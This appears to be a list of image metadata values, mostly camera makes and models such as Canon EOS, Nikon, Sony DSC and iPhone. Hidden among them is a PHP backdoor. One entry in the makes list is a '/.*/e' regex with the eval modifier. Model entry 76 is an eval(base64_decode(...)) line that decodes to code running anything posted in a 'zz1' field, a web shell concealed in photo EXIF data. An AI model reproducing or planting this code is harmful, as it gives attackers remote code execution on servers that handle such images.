0 False 
1 True 


1 /.*/3
2 /.*/e
3 Apple
5 Canon
6 EASTMAN KODAK COMPANY
7 Eastman Kodak Company
8 FUJIFILM
9 Hasselblad
10 Hewlett-Packard
11 HP
12 motorola
13 NIKON CORPORATION
14 Nikon
15 OLYMPUS OPTICAL CO.,LTD
16 Panasonic
17 Samsung Techwin
18 SAMSUNG
19 SONY
20 T80
21 ZTE


1 DSC-R1
2 DSC-F828
3 ZTE
4 T80
5 DSC-V3
6 DSC-RX100M4
7 DSC-HX50V
8 CYBERSHOT
9 MVC-CD500
10 DSC-P10
11 < Digimax U-CA 5, Kenox U-CA 5 / Kenox U-CA 50 >
12 < Digimax S600 / Kenox S600 / Digimax Cyber 630>
13 C2040Z
14 C3040Z
15 DMC-FX5
16 GT-N7000
17 SM-J100H
18 SM-G930V
19 C2500L
20 NIKON D1X
21 NIKON D200
22 NIKON D100
23 NIKON D800E
24 NIKON D80
25 NIKON D40X
26 NIKON D600
27 NIKON D3300
28 C40Z,D40Z
29 C3030Z
30 NIKON D2X
31 Nikon SUPER COOLSCAN 5000 ED
32 D7100
33 COOLPIX S1100pj
34 E4500
35 COOLPIX S8200
36 Moto G (4)
37 Moto G (5) Plus
38 E990
39 E995
40 E4800
41 E7900
42 KODAK DC4800 ZOOM DIGITAL CAMERA
43 KODAK Z740 ZOOM DIGITAL CAMERA
44 DC210 Zoom (V05.00)
45 FinePixS1Pro
46 FinePix S5200
47 FinePix S602 ZOOM
48 FinePix JX280
49 FinePixS2Pro
50 Hasselblad CF-39MS
51 HP PhotoSmart C850 (V05.32)
52 HP oj4300
53 KODAK CX7330 ZOOM DIGITAL CAMERA
54 KODAK DX4330 DIGITAL CAMERA
55 Canon EOS 5D Mark II
56 Canon EOS 5D Mark IV
57 Canon PowerShot SD1400 IS
58 Canon EOS 5DS R
59 Canon EOS 40D
60 Canon PowerShot SX710 HS
61 Canon PowerShot S40
62 Canon EOS 60D
63 Canon EOS 5D Mark III
64 Canon EOS 100D
65 Canon PowerShot SD1200 IS
66 Canon EOS 50D
67 Canon EOS 5D Mark II
68 Canon EOS 6D
69 Canon PowerShot SD950 IS
70 Canon PowerShot SD200
71 Canon EOS D60
72 Canon PowerShot SD630
73 Canon PowerShot S30
74 iPhone 5s
75 iPhone SE
iPhone 5c
iPhone 5
76- eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='))
77 Canon PowerShot A620
78 Canon EOS 30D
79 DV
